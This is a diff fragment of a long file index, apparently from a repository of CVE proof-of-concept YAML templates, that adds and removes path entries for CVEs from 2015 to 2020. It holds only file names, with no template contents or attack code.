-./poc/cve/cve-2015-0554-2456.yaml ./poc/cve/cve-2015-1000012-2457.yaml ./poc/cve/cve-2015-1000012-2458.yaml ./poc/cve/cve-2015-1000012-2459.yaml @@ -38304,7 +38286,6 @@ ./poc/cve/cve-2015-1880-2474.yaml ./poc/cve/cve-2015-1880-2475.yaml ./poc/cve/cve-2015-1880-2476.yaml -./poc/cve/cve-2015-1880-2477.yaml ./poc/cve/cve-2015-1880-2478.yaml ./poc/cve/cve-2015-2067-2479.yaml ./poc/cve/cve-2015-2067-2480.yaml 
@@ -38324,14 +38305,12 @@ ./poc/cve/cve-2015-2166-2494.yaml ./poc/cve/cve-2015-2166-2495.yaml ./poc/cve/cve-2015-2166-2496.yaml -./poc/cve/cve-2015-2166.yaml ./poc/cve/cve-2015-2794.yaml ./poc/cve/cve-2015-2807-2497.yaml ./poc/cve/cve-2015-2807-2498.yaml ./poc/cve/cve-2015-2807-2499.yaml ./poc/cve/cve-2015-2807-2500.yaml ./poc/cve/cve-2015-2807-2501.yaml -./poc/cve/cve-2015-3306-2502.yaml ./poc/cve/cve-2015-3306-2503.yaml ./poc/cve/cve-2015-3306-2504.yaml ./poc/cve/cve-2015-3306-2505.yaml @@ -38356,7 +38335,6 @@ ./poc/cve/cve-2015-4050-2524.yaml ./poc/cve/cve-2015-4050-2525.yaml ./poc/cve/cve-2015-4050-2526.yaml -./poc/cve/cve-2015-4050.yaml ./poc/cve/cve-2015-4414-2527.yaml ./poc/cve/cve-2015-4414-2528.yaml ./poc/cve/cve-2015-4414-2529.yaml @@ -38433,6 +38411,7 @@ ./poc/cve/cve-2015-7780-2601.yaml ./poc/cve/cve-2015-7780-2602.yaml ./poc/cve/cve-2015-7780-2603.yaml +./poc/cve/cve-2015-7780-2604.yaml ./poc/cve/cve-2015-7823-2605.yaml ./poc/cve/cve-2015-7823-2606.yaml ./poc/cve/cve-2015-7823-2607.yaml @@ -38476,7 +38455,6 @@ ./poc/cve/cve-2016-1000128-2648.yaml ./poc/cve/cve-2016-1000128-2649.yaml ./poc/cve/cve-2016-1000128-2650.yaml -./poc/cve/cve-2016-1000128-2651.yaml ./poc/cve/cve-2016-1000129-2652.yaml ./poc/cve/cve-2016-1000129-2653.yaml ./poc/cve/cve-2016-1000129-2654.yaml @@ -38494,7 +38472,6 @@ ./poc/cve/cve-2016-1000132-2666.yaml ./poc/cve/cve-2016-1000132-2667.yaml ./poc/cve/cve-2016-1000132-2668.yaml -./poc/cve/cve-2016-1000132-2669.yaml ./poc/cve/cve-2016-1000132-2670.yaml ./poc/cve/cve-2016-1000133-2671.yaml ./poc/cve/cve-2016-1000133-2672.yaml @@ -38503,7 +38480,6 @@ ./poc/cve/cve-2016-1000133-2675.yaml ./poc/cve/cve-2016-1000134-2676.yaml ./poc/cve/cve-2016-1000134-2677.yaml -./poc/cve/cve-2016-1000134-2678.yaml ./poc/cve/cve-2016-1000134-2679.yaml ./poc/cve/cve-2016-1000134-2680.yaml ./poc/cve/cve-2016-1000135-2681.yaml 
@@ -38541,7 +38517,6 @@ ./poc/cve/cve-2016-1000142-2714.yaml ./poc/cve/cve-2016-1000143-2715.yaml ./poc/cve/cve-2016-1000143-2716.yaml -./poc/cve/cve-2016-1000143-2717.yaml ./poc/cve/cve-2016-1000146-2718.yaml ./poc/cve/cve-2016-1000146-2719.yaml ./poc/cve/cve-2016-1000146-2720.yaml @@ -38564,6 +38539,7 @@ ./poc/cve/cve-2016-1000154-2737.yaml ./poc/cve/cve-2016-1000154-2738.yaml ./poc/cve/cve-2016-1000154-2739.yaml +./poc/cve/cve-2016-1000154-2740.yaml ./poc/cve/cve-2016-1000155-2741.yaml ./poc/cve/cve-2016-1000155-2742.yaml ./poc/cve/cve-2016-1000155-2743.yaml @@ -38578,7 +38554,6 @@ ./poc/cve/cve-2016-10924-2754.yaml ./poc/cve/cve-2016-10924-2755.yaml ./poc/cve/cve-2016-10940-2756.yaml -./poc/cve/cve-2016-10940-2757.yaml ./poc/cve/cve-2016-10956-2758.yaml ./poc/cve/cve-2016-10956-2759.yaml ./poc/cve/cve-2016-10956-2760.yaml @@ -38625,7 +38600,6 @@ ./poc/cve/cve-2016-5649-2801.yaml ./poc/cve/cve-2016-6210-2802.yaml ./poc/cve/cve-2016-6210-2803.yaml -./poc/cve/cve-2016-6210.yaml ./poc/cve/cve-2016-6277-2804.yaml ./poc/cve/cve-2016-6277-2806.yaml ./poc/cve/cve-2016-6277-2807.yaml @@ -38633,7 +38607,6 @@ ./poc/cve/cve-2016-7552-2809.yaml ./poc/cve/cve-2016-7552-2810.yaml ./poc/cve/cve-2016-7552-2811.yaml -./poc/cve/cve-2016-7552-2812.yaml ./poc/cve/cve-2016-7552-2813.yaml ./poc/cve/cve-2016-7981-2814.yaml ./poc/cve/cve-2016-7981-2815.yaml @@ -38703,6 +38676,7 @@ ./poc/cve/cve-2017-12149-2881.yaml ./poc/cve/cve-2017-12149-2882.yaml ./poc/cve/cve-2017-12149-2883.yaml +./poc/cve/cve-2017-12542-2884.yaml ./poc/cve/cve-2017-12542-2885.yaml ./poc/cve/cve-2017-12542-2886.yaml ./poc/cve/cve-2017-12542-2887.yaml @@ -38723,7 +38697,6 @@ ./poc/cve/cve-2017-12615-2903.yaml ./poc/cve/cve-2017-12615-2904.yaml ./poc/cve/cve-2017-12615-2905.yaml -./poc/cve/cve-2017-12615.yaml ./poc/cve/cve-2017-12629-2906.yaml ./poc/cve/cve-2017-12629-2907.yaml ./poc/cve/cve-2017-12629-2908.yaml 
@@ -38746,7 +38719,6 @@ ./poc/cve/cve-2017-14135-2925.yaml ./poc/cve/cve-2017-14135-2926.yaml ./poc/cve/cve-2017-14535-2927.yaml -./poc/cve/cve-2017-14535-2928.yaml ./poc/cve/cve-2017-14535-2929.yaml ./poc/cve/cve-2017-14535-2930.yaml ./poc/cve/cve-2017-14535-2931.yaml @@ -38772,7 +38744,6 @@ ./poc/cve/cve-2017-15647-2952.yaml ./poc/cve/cve-2017-15647-2953.yaml ./poc/cve/cve-2017-15647-2954.yaml -./poc/cve/cve-2017-15647-2955.yaml ./poc/cve/cve-2017-15647-2956.yaml ./poc/cve/cve-2017-15715-2957.yaml ./poc/cve/cve-2017-15715-2958.yaml @@ -38782,6 +38753,7 @@ ./poc/cve/cve-2017-15715-2962.yaml ./poc/cve/cve-2017-15944-2963.yaml ./poc/cve/cve-2017-15944-2964.yaml +./poc/cve/cve-2017-15944-2965.yaml ./poc/cve/cve-2017-16806-2966.yaml ./poc/cve/cve-2017-16806-2967.yaml ./poc/cve/cve-2017-16806-2968.yaml @@ -38798,7 +38770,6 @@ ./poc/cve/cve-2017-17059-2980.yaml ./poc/cve/cve-2017-17451-2981.yaml ./poc/cve/cve-2017-17451-2982.yaml -./poc/cve/cve-2017-17451-2983.yaml ./poc/cve/cve-2017-17562-2984.yaml ./poc/cve/cve-2017-17562-2985.yaml ./poc/cve/cve-2017-17562-2986.yaml @@ -38811,7 +38782,6 @@ ./poc/cve/cve-2017-18024-2992.yaml ./poc/cve/cve-2017-18536-2993.yaml ./poc/cve/cve-2017-18536-2994.yaml -./poc/cve/cve-2017-18536-2995.yaml ./poc/cve/cve-2017-18598-2996.yaml ./poc/cve/cve-2017-18598-2997.yaml ./poc/cve/cve-2017-18638-2998.yaml @@ -38827,7 +38797,6 @@ ./poc/cve/cve-2017-3528-3009.yaml ./poc/cve/cve-2017-3528-3010.yaml ./poc/cve/cve-2017-3528-3011.yaml -./poc/cve/cve-2017-3528-3012.yaml ./poc/cve/cve-2017-3528-3013.yaml ./poc/cve/cve-2017-3881-3014.yaml ./poc/cve/cve-2017-3881-3015.yaml 
@@ -38840,12 +38809,13 @@ ./poc/cve/cve-2017-5487-3022.yaml ./poc/cve/cve-2017-5487-3023.yaml ./poc/cve/cve-2017-5487-3024.yaml -./poc/cve/cve-2017-5487.yaml ./poc/cve/cve-2017-5521-3025.yaml ./poc/cve/cve-2017-5521-3026.yaml +./poc/cve/cve-2017-5521-3027.yaml ./poc/cve/cve-2017-5521-3028.yaml ./poc/cve/cve-2017-5521-3029.yaml ./poc/cve/cve-2017-5631-3030.yaml +./poc/cve/cve-2017-5631-3031.yaml ./poc/cve/cve-2017-5638-3032.yaml ./poc/cve/cve-2017-5638-3033.yaml ./poc/cve/cve-2017-5638-3034.yaml @@ -38858,7 +38828,6 @@ ./poc/cve/cve-2017-5982-3041.yaml ./poc/cve/cve-2017-5982-3042.yaml ./poc/cve/cve-2017-6090-3043.yaml -./poc/cve/cve-2017-6090-3044.yaml ./poc/cve/cve-2017-6090-3045.yaml ./poc/cve/cve-2017-6090-3046.yaml ./poc/cve/cve-2017-6360-3047.yaml @@ -38876,7 +38845,6 @@ ./poc/cve/cve-2017-7391-3060.yaml ./poc/cve/cve-2017-7391-3061.yaml ./poc/cve/cve-2017-7391-3062.yaml -./poc/cve/cve-2017-7391.yaml ./poc/cve/cve-2017-7529-3063.yaml ./poc/cve/cve-2017-7529-3064.yaml ./poc/cve/cve-2017-7529-3065.yaml @@ -38892,6 +38860,7 @@ ./poc/cve/cve-2017-8917-3075.yaml ./poc/cve/cve-2017-8917-3076.yaml ./poc/cve/cve-2017-8917-3077.yaml +./poc/cve/cve-2017-8917-3078.yaml ./poc/cve/cve-2017-8917-3079.yaml ./poc/cve/cve-2017-9140-3080.yaml ./poc/cve/cve-2017-9140-3081.yaml @@ -38916,7 +38885,9 @@ ./poc/cve/cve-2017-9805-3101.yaml ./poc/cve/cve-2017-9805-3102.yaml ./poc/cve/cve-2017-9805-3103.yaml +./poc/cve/cve-2017-9805-3104.yaml ./poc/cve/cve-2017-9805-3105.yaml +./poc/cve/cve-2017-9822-3106.yaml ./poc/cve/cve-2017-9822-3107.yaml ./poc/cve/cve-2017-9822-3108.yaml ./poc/cve/cve-2017-9822-3109.yaml 
@@ -38944,12 +38915,12 @@ ./poc/cve/cve-2018-1000129-3131.yaml ./poc/cve/cve-2018-1000129-3132.yaml ./poc/cve/cve-2018-1000129-3133.yaml +./poc/cve/cve-2018-1000129.yaml ./poc/cve/cve-2018-1000130-3134.yaml ./poc/cve/cve-2018-1000130-3135.yaml ./poc/cve/cve-2018-1000130-3136.yaml ./poc/cve/cve-2018-1000130-3137.yaml ./poc/cve/cve-2018-1000226-3138.yaml -./poc/cve/cve-2018-1000226-3139.yaml ./poc/cve/cve-2018-1000226-3140.yaml ./poc/cve/cve-2018-1000533-3142.yaml ./poc/cve/cve-2018-1000533-3143.yaml @@ -38979,7 +38950,6 @@ ./poc/cve/cve-2018-10562-3168.yaml ./poc/cve/cve-2018-10562-3169.yaml ./poc/cve/cve-2018-10562-3170.yaml -./poc/cve/cve-2018-10818-3171.yaml ./poc/cve/cve-2018-10818-3172.yaml ./poc/cve/cve-2018-10818-3173.yaml ./poc/cve/cve-2018-10818-3174.yaml @@ -39004,6 +38974,7 @@ ./poc/cve/cve-2018-11409-3193.yaml ./poc/cve/cve-2018-11409-3194.yaml ./poc/cve/cve-2018-11409-3195.yaml +./poc/cve/cve-2018-11409.yaml ./poc/cve/cve-2018-11709-3196.yaml ./poc/cve/cve-2018-11709-3197.yaml ./poc/cve/cve-2018-11709-3198.yaml @@ -39110,7 +39081,6 @@ ./poc/cve/cve-2018-14013-3298.yaml ./poc/cve/cve-2018-14064-3299.yaml ./poc/cve/cve-2018-14064-3300.yaml -./poc/cve/cve-2018-14064-3301.yaml ./poc/cve/cve-2018-14474-3302.yaml ./poc/cve/cve-2018-14474-3303.yaml ./poc/cve/cve-2018-14574-3304.yaml @@ -39124,8 +39094,6 @@ ./poc/cve/cve-2018-14728-3312.yaml ./poc/cve/cve-2018-14728-3313.yaml ./poc/cve/cve-2018-14728-3314.yaml -./poc/cve/cve-2018-14728.yaml -./poc/cve/cve-2018-14912-3315.yaml ./poc/cve/cve-2018-14912-3316.yaml ./poc/cve/cve-2018-14912-3317.yaml ./poc/cve/cve-2018-14916-3318.yaml @@ -39138,7 +39106,6 @@ ./poc/cve/cve-2018-15138-3327.yaml ./poc/cve/cve-2018-15138-3328.yaml ./poc/cve/cve-2018-15473-3330.yaml -./poc/cve/cve-2018-15517-3331.yaml ./poc/cve/cve-2018-15517-3332.yaml ./poc/cve/cve-2018-15517-3333.yaml ./poc/cve/cve-2018-15517-3334.yaml 
@@ -39164,12 +39131,13 @@ ./poc/cve/cve-2018-16133-3355.yaml ./poc/cve/cve-2018-16133-3356.yaml ./poc/cve/cve-2018-16133-3357.yaml -./poc/cve/cve-2018-16133-3358.yaml +./poc/cve/cve-2018-16167-3359.yaml ./poc/cve/cve-2018-16167-3360.yaml ./poc/cve/cve-2018-16167-3361.yaml ./poc/cve/cve-2018-16283-3362.yaml ./poc/cve/cve-2018-16283-3363.yaml ./poc/cve/cve-2018-16283-3364.yaml +./poc/cve/cve-2018-16288-3365.yaml ./poc/cve/cve-2018-16288-3366.yaml ./poc/cve/cve-2018-16288-3367.yaml ./poc/cve/cve-2018-16288-3368.yaml @@ -39225,8 +39193,8 @@ ./poc/cve/cve-2018-17254-3418.yaml ./poc/cve/cve-2018-17422-3419.yaml ./poc/cve/cve-2018-17422-3420.yaml -./poc/cve/cve-2018-17422-3421.yaml ./poc/cve/cve-2018-17431-3422.yaml +./poc/cve/cve-2018-17431-3423.yaml ./poc/cve/cve-2018-17431-3424.yaml ./poc/cve/cve-2018-18069-3425.yaml ./poc/cve/cve-2018-18069-3426.yaml @@ -39275,7 +39243,6 @@ ./poc/cve/cve-2018-19386-3471.yaml ./poc/cve/cve-2018-19386-3472.yaml ./poc/cve/cve-2018-19386-3473.yaml -./poc/cve/cve-2018-19386.yaml ./poc/cve/cve-2018-19439-3474.yaml ./poc/cve/cve-2018-19439-3475.yaml ./poc/cve/cve-2018-19439-3476.yaml @@ -39287,14 +39254,12 @@ ./poc/cve/cve-2018-19458-3483.yaml ./poc/cve/cve-2018-19458-3484.yaml ./poc/cve/cve-2018-19458-3485.yaml -./poc/cve/cve-2018-19752(1).yaml ./poc/cve/cve-2018-19753-3486.yaml ./poc/cve/cve-2018-19753-3487.yaml ./poc/cve/cve-2018-19753-3488.yaml -./poc/cve/cve-2018-19877(1).yaml ./poc/cve/cve-2018-19892(1).yaml ./poc/cve/cve-2018-20009(1).yaml -./poc/cve/cve-2018-20010(1).yaml +./poc/cve/cve-2018-20011(1).yaml ./poc/cve/cve-2018-20062-3489.yaml ./poc/cve/cve-2018-20062-3490.yaml ./poc/cve/cve-2018-20062-3491.yaml @@ -39303,7 +39268,6 @@ ./poc/cve/cve-2018-20462-3494.yaml ./poc/cve/cve-2018-20470-3495.yaml ./poc/cve/cve-2018-20470-3496.yaml -./poc/cve/cve-2018-20470-3497.yaml ./poc/cve/cve-2018-20470-3498.yaml ./poc/cve/cve-2018-20824-3499.yaml ./poc/cve/cve-2018-20824-3500.yaml 
@@ -39313,7 +39277,6 @@ ./poc/cve/cve-2018-20824-3504.yaml ./poc/cve/cve-2018-20985-3505.yaml ./poc/cve/cve-2018-20985-3506.yaml -./poc/cve/cve-2018-20985-3507.yaml ./poc/cve/cve-2018-2392-3508.yaml ./poc/cve/cve-2018-2392-3509.yaml ./poc/cve/cve-2018-2392-3510.yaml @@ -39341,7 +39304,6 @@ ./poc/cve/cve-2018-3167-3534.yaml ./poc/cve/cve-2018-3167-3535.yaml ./poc/cve/cve-2018-3167-3536.yaml -./poc/cve/cve-2018-3167.yaml ./poc/cve/cve-2018-3238-1.yaml ./poc/cve/cve-2018-3238-2.yaml ./poc/cve/cve-2018-3238-3.yaml @@ -39374,25 +39336,24 @@ ./poc/cve/cve-2018-5230-3564.yaml ./poc/cve/cve-2018-5233-3565.yaml ./poc/cve/cve-2018-5233-3566.yaml -./poc/cve/cve-2018-5233-3567.yaml ./poc/cve/cve-2018-5316-3568.yaml ./poc/cve/cve-2018-5316-3569.yaml ./poc/cve/cve-2018-5316-3570.yaml ./poc/cve/cve-2018-6008-3571.yaml ./poc/cve/cve-2018-6008-3572.yaml ./poc/cve/cve-2018-6008-3573.yaml +./poc/cve/cve-2018-6008-3574.yaml ./poc/cve/cve-2018-6008-3575.yaml ./poc/cve/cve-2018-6200-3576.yaml ./poc/cve/cve-2018-6200-3577.yaml -./poc/cve/cve-2018-6200-3578.yaml ./poc/cve/cve-2018-6389-3579.yaml ./poc/cve/cve-2018-6389-3580.yaml ./poc/cve/cve-2018-6389-3581.yaml ./poc/cve/cve-2018-6910-3582.yaml ./poc/cve/cve-2018-6910-3583.yaml ./poc/cve/cve-2018-6910-3584.yaml +./poc/cve/cve-2018-6910-3585.yaml ./poc/cve/cve-2018-6910-3586.yaml -./poc/cve/cve-2018-7251-3587.yaml ./poc/cve/cve-2018-7251-3588.yaml ./poc/cve/cve-2018-7251-3589.yaml ./poc/cve/cve-2018-7251-3590.yaml @@ -39403,6 +39364,7 @@ ./poc/cve/cve-2018-7422-3595.yaml ./poc/cve/cve-2018-7422-3596.yaml ./poc/cve/cve-2018-7467-3597.yaml +./poc/cve/cve-2018-7467-3598.yaml ./poc/cve/cve-2018-7467-3599.yaml ./poc/cve/cve-2018-7467-3600.yaml ./poc/cve/cve-2018-7490-3601.yaml @@ -39422,6 +39384,7 @@ ./poc/cve/cve-2018-7602-3615.yaml ./poc/cve/cve-2018-7662-3616.yaml ./poc/cve/cve-2018-7662-3617.yaml +./poc/cve/cve-2018-7700-3618.yaml ./poc/cve/cve-2018-7700-3619.yaml ./poc/cve/cve-2018-7700-3620.yaml ./poc/cve/cve-2018-7700-3621.yaml 
@@ -39456,7 +39419,6 @@ ./poc/cve/cve-2018-9118-3651.yaml ./poc/cve/cve-2018-9118-3652.yaml ./poc/cve/cve-2018-9118-3653.yaml -./poc/cve/cve-2018-9118-3654.yaml ./poc/cve/cve-2018-9126-3655.yaml ./poc/cve/cve-2018-9126-3656.yaml ./poc/cve/cve-2018-9126-3657.yaml @@ -39472,6 +39434,7 @@ ./poc/cve/cve-2018-9995-3667.yaml ./poc/cve/cve-2018-9995-3668.yaml ./poc/cve/cve-2018-9995-3669.yaml +./poc/cve/cve-2018–14064(1).yaml ./poc/cve/cve-2019-0193-3670.yaml ./poc/cve/cve-2019-0193-3671.yaml ./poc/cve/cve-2019-0193-3672.yaml @@ -39498,6 +39461,7 @@ ./poc/cve/cve-2019-10092-3693.yaml ./poc/cve/cve-2019-1010287-3694.yaml ./poc/cve/cve-2019-1010287-3695.yaml +./poc/cve/cve-2019-1010287-3696.yaml ./poc/cve/cve-2019-1010287-3697.yaml ./poc/cve/cve-2019-1010287-3698.yaml ./poc/cve/cve-2019-1010290-3699.yaml @@ -39516,10 +39480,12 @@ ./poc/cve/cve-2019-10475-3712.yaml ./poc/cve/cve-2019-10475-3713.yaml ./poc/cve/cve-2019-10475-3714.yaml +./poc/cve/cve-2019-10692(1).yaml ./poc/cve/cve-2019-10758-3715.yaml ./poc/cve/cve-2019-10758-3716.yaml ./poc/cve/cve-2019-10758-3717.yaml ./poc/cve/cve-2019-10758-3718.yaml +./poc/cve/cve-2019-11013-3719.yaml ./poc/cve/cve-2019-11013-3720.yaml ./poc/cve/cve-2019-11013-3721.yaml ./poc/cve/cve-2019-11013-3722.yaml @@ -39531,11 +39497,9 @@ ./poc/cve/cve-2019-11248-3728.yaml ./poc/cve/cve-2019-11248-3729.yaml ./poc/cve/cve-2019-11248-3730.yaml -./poc/cve/cve-2019-11248-3731.yaml ./poc/cve/cve-2019-11248-3732.yaml ./poc/cve/cve-2019-11248-3733.yaml ./poc/cve/cve-2019-11248-3734.yaml -./poc/cve/cve-2019-11370(1).yaml ./poc/cve/cve-2019-11510-3735.yaml ./poc/cve/cve-2019-11510-3736.yaml ./poc/cve/cve-2019-11510-3737.yaml @@ -39609,7 +39573,7 @@ ./poc/cve/cve-2019-12725-3799.yaml ./poc/cve/cve-2019-12725-3800.yaml ./poc/cve/cve-2019-12725-3801.yaml -./poc/cve/cve-2019-13101-3802.yaml +./poc/cve/cve-2019-12962(1).yaml ./poc/cve/cve-2019-13101-3803.yaml ./poc/cve/cve-2019-13101-3804.yaml ./poc/cve/cve-2019-13101-3805.yaml 
@@ -39645,6 +39609,7 @@ ./poc/cve/cve-2019-14223-3835.yaml ./poc/cve/cve-2019-14223-3836.yaml ./poc/cve/cve-2019-14223.yaml +./poc/cve/cve-2019-14251(1).yaml ./poc/cve/cve-2019-14251-3837.yaml ./poc/cve/cve-2019-14251-3838.yaml ./poc/cve/cve-2019-14312-3839.yaml @@ -39699,6 +39664,7 @@ ./poc/cve/cve-2019-15713-3884.yaml ./poc/cve/cve-2019-15713-3885.yaml ./poc/cve/cve-2019-15713-3886.yaml +./poc/cve/cve-2019-15713-3887.yaml ./poc/cve/cve-2019-15858-3888.yaml ./poc/cve/cve-2019-15858-3889.yaml ./poc/cve/cve-2019-15858-3890.yaml @@ -39725,12 +39691,10 @@ ./poc/cve/cve-2019-16097-3911.yaml ./poc/cve/cve-2019-16097-3912.yaml ./poc/cve/cve-2019-16097-3913.yaml -./poc/cve/cve-2019-16097.yaml ./poc/cve/cve-2019-16123-3914.yaml ./poc/cve/cve-2019-16123-3915.yaml ./poc/cve/cve-2019-16123-3916.yaml ./poc/cve/cve-2019-16123-3917.yaml -./poc/cve/cve-2019-16123-3918.yaml ./poc/cve/cve-2019-16278-3919.yaml ./poc/cve/cve-2019-16278-3920.yaml ./poc/cve/cve-2019-16278-3921.yaml @@ -39738,6 +39702,7 @@ ./poc/cve/cve-2019-16278-3923.yaml ./poc/cve/cve-2019-16278-3924.yaml ./poc/cve/cve-2019-16278-3925.yaml +./poc/cve/cve-2019-16278.yaml ./poc/cve/cve-2019-16313-3926.yaml ./poc/cve/cve-2019-16313-3927.yaml ./poc/cve/cve-2019-16313-3928.yaml @@ -39779,7 +39744,6 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml -./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml ./poc/cve/cve-2019-16932(1).yaml ./poc/cve/cve-2019-16932-3964.yaml @@ -39801,7 +39765,6 @@ ./poc/cve/cve-2019-17382-3979.yaml ./poc/cve/cve-2019-17382-4.yaml ./poc/cve/cve-2019-17418-3980.yaml -./poc/cve/cve-2019-17418-3981.yaml ./poc/cve/cve-2019-17418-3982.yaml ./poc/cve/cve-2019-17444-3983.yaml ./poc/cve/cve-2019-17444-3984.yaml 
@@ -39824,6 +39787,7 @@ ./poc/cve/cve-2019-17558-4000.yaml ./poc/cve/cve-2019-17558-4001.yaml ./poc/cve/cve-2019-17558-4002.yaml +./poc/cve/cve-2019-17558.yaml ./poc/cve/cve-2019-1821-4003.yaml ./poc/cve/cve-2019-1821-4004.yaml ./poc/cve/cve-2019-18371-4005.yaml @@ -39840,8 +39804,11 @@ ./poc/cve/cve-2019-18394-4016.yaml ./poc/cve/cve-2019-18394-4017.yaml ./poc/cve/cve-2019-18394-4018.yaml +./poc/cve/cve-2019-18394.yaml +./poc/cve/cve-2019-18665(1).yaml ./poc/cve/cve-2019-18665-4019.yaml ./poc/cve/cve-2019-18665-4020.yaml +./poc/cve/cve-2019-18818-4021.yaml ./poc/cve/cve-2019-18818-4022.yaml ./poc/cve/cve-2019-18818-4023.yaml ./poc/cve/cve-2019-18818-4024.yaml @@ -39859,6 +39826,7 @@ ./poc/cve/cve-2019-19368-4036.yaml ./poc/cve/cve-2019-19368-4037.yaml ./poc/cve/cve-2019-19368-4038.yaml +./poc/cve/cve-2019-19368.yaml ./poc/cve/cve-2019-19719-4039.yaml ./poc/cve/cve-2019-19719-4040.yaml ./poc/cve/cve-2019-19719-4041.yaml @@ -39873,7 +39841,6 @@ ./poc/cve/cve-2019-19824-4050.yaml ./poc/cve/cve-2019-19824-4051.yaml ./poc/cve/cve-2019-19824-4052.yaml -./poc/cve/cve-2019-19824-4053.yaml ./poc/cve/cve-2019-19908-4054.yaml ./poc/cve/cve-2019-19908-4055.yaml ./poc/cve/cve-2019-19908-4056.yaml @@ -39909,10 +39876,9 @@ ./poc/cve/cve-2019-20183-4084.yaml ./poc/cve/cve-2019-20183-4085.yaml ./poc/cve/cve-2019-20183-4086.yaml -./poc/cve/cve-2019-20210(1).yaml -./poc/cve/cve-2019-20224(1).yaml ./poc/cve/cve-2019-20224-4087.yaml ./poc/cve/cve-2019-20354(1).yaml +./poc/cve/cve-2019-20933(1).yaml ./poc/cve/cve-2019-2578-1.yaml ./poc/cve/cve-2019-2578-2.yaml ./poc/cve/cve-2019-2578-4088.yaml @@ -39928,7 +39894,6 @@ ./poc/cve/cve-2019-2588-4098.yaml ./poc/cve/cve-2019-2588-4099.yaml ./poc/cve/cve-2019-2588-4100.yaml -./poc/cve/cve-2019-2616(1).yaml ./poc/cve/cve-2019-2616-4101.yaml ./poc/cve/cve-2019-2616-4102.yaml ./poc/cve/cve-2019-2616-4103.yaml 
@@ -39945,7 +39910,6 @@ ./poc/cve/cve-2019-2729-4114.yaml ./poc/cve/cve-2019-2729-4115.yaml ./poc/cve/cve-2019-2767-4116.yaml -./poc/cve/cve-2019-2767-4117.yaml ./poc/cve/cve-2019-2767-4118.yaml ./poc/cve/cve-2019-2767-4119.yaml ./poc/cve/cve-2019-2767-4120.yaml @@ -40012,6 +39976,7 @@ ./poc/cve/cve-2019-6112-4176.yaml ./poc/cve/cve-2019-6112-4177.yaml ./poc/cve/cve-2019-6112-4178.yaml +./poc/cve/cve-2019-6340(1).yaml ./poc/cve/cve-2019-6340-4179.yaml ./poc/cve/cve-2019-6340-4180.yaml ./poc/cve/cve-2019-6340-4181.yaml @@ -40039,6 +40004,7 @@ ./poc/cve/cve-2019-7238-4204.yaml ./poc/cve/cve-2019-7238-4205.yaml ./poc/cve/cve-2019-7238-4206.yaml +./poc/cve/cve-2019-7238-4207.yaml ./poc/cve/cve-2019-7254-1.yaml ./poc/cve/cve-2019-7254-2.yaml ./poc/cve/cve-2019-7254-4208.yaml @@ -40068,6 +40034,7 @@ ./poc/cve/cve-2019-7543-2.yaml ./poc/cve/cve-2019-7543-4231.yaml ./poc/cve/cve-2019-7543-4232.yaml +./poc/cve/cve-2019-7609-4233.yaml ./poc/cve/cve-2019-7609-4234.yaml ./poc/cve/cve-2019-7609-4235.yaml ./poc/cve/cve-2019-7609-4236.yaml @@ -40087,7 +40054,6 @@ ./poc/cve/cve-2019-8446-4249.yaml ./poc/cve/cve-2019-8446-4250.yaml ./poc/cve/cve-2019-8446-4251.yaml -./poc/cve/cve-2019-8446-4252.yaml ./poc/cve/cve-2019-8449-4253.yaml ./poc/cve/cve-2019-8449-4254.yaml ./poc/cve/cve-2019-8449-4255.yaml @@ -40109,11 +40075,11 @@ ./poc/cve/cve-2019-8903-4271.yaml ./poc/cve/cve-2019-8903-4272.yaml ./poc/cve/cve-2019-8903-4273.yaml -./poc/cve/cve-2019-8903.yaml ./poc/cve/cve-2019-8937-4274.yaml ./poc/cve/cve-2019-8937-4275.yaml ./poc/cve/cve-2019-8937-4276.yaml ./poc/cve/cve-2019-8937-4277.yaml +./poc/cve/cve-2019-8937-4278.yaml ./poc/cve/cve-2019-8982-4279.yaml ./poc/cve/cve-2019-8982-4280.yaml ./poc/cve/cve-2019-8982-4281.yaml @@ -40128,7 +40094,6 @@ ./poc/cve/cve-2019-9041-4289.yaml ./poc/cve/cve-2019-9041-4290.yaml ./poc/cve/cve-2019-9041-4291.yaml -./poc/cve/cve-2019-9082-4292.yaml ./poc/cve/cve-2019-9082-4293.yaml ./poc/cve/cve-2019-9082-4294.yaml ./poc/cve/cve-2019-9618-4295.yaml 
@@ -40156,6 +40121,7 @@ ./poc/cve/cve-2019-9733-4315.yaml ./poc/cve/cve-2019-9733-4316.yaml ./poc/cve/cve-2019-9733.yaml +./poc/cve/cve-2019-9915(1).yaml ./poc/cve/cve-2019-9915-4317.yaml ./poc/cve/cve-2019-9922-4318.yaml ./poc/cve/cve-2019-9922-4319.yaml @@ -40181,6 +40147,7 @@ ./poc/cve/cve-2020-0618-4338.yaml ./poc/cve/cve-2020-0618-4339.yaml ./poc/cve/cve-2020-0618.yaml +./poc/cve/cve-2020-10124(1).yaml ./poc/cve/cve-2020-10148-4340.yaml ./poc/cve/cve-2020-10148-4341.yaml ./poc/cve/cve-2020-10148-4342.yaml @@ -40198,7 +40165,6 @@ ./poc/cve/cve-2020-10220-4354.yaml ./poc/cve/cve-2020-10220-4355.yaml ./poc/cve/cve-2020-10220-4356.yaml -./poc/cve/cve-2020-10220.yaml ./poc/cve/cve-2020-10546-4357.yaml ./poc/cve/cve-2020-10546-4358.yaml ./poc/cve/cve-2020-10546-4359.yaml @@ -40240,7 +40206,6 @@ ./poc/cve/cve-2020-11110-4394.yaml ./poc/cve/cve-2020-11450-4395.yaml ./poc/cve/cve-2020-11450-4396.yaml -./poc/cve/cve-2020-11455-4397.yaml ./poc/cve/cve-2020-11455-4398.yaml ./poc/cve/cve-2020-11455-4399.yaml ./poc/cve/cve-2020-11455-4400.yaml @@ -40257,6 +40222,7 @@ ./poc/cve/cve-2020-11530-4410.yaml ./poc/cve/cve-2020-11530-4411.yaml ./poc/cve/cve-2020-11530-4412.yaml +./poc/cve/cve-2020-11530.yaml ./poc/cve/cve-2020-11546-4413.yaml ./poc/cve/cve-2020-11546-4414.yaml ./poc/cve/cve-2020-11547-1.yaml @@ -40272,6 +40238,7 @@ ./poc/cve/cve-2020-11710-4422.yaml ./poc/cve/cve-2020-11710-4423.yaml ./poc/cve/cve-2020-11710-4424.yaml +./poc/cve/cve-2020-11738(1).yaml ./poc/cve/cve-2020-11738-1.yaml ./poc/cve/cve-2020-11738-2.yaml ./poc/cve/cve-2020-11738-4425.yaml @@ -40296,6 +40263,7 @@ 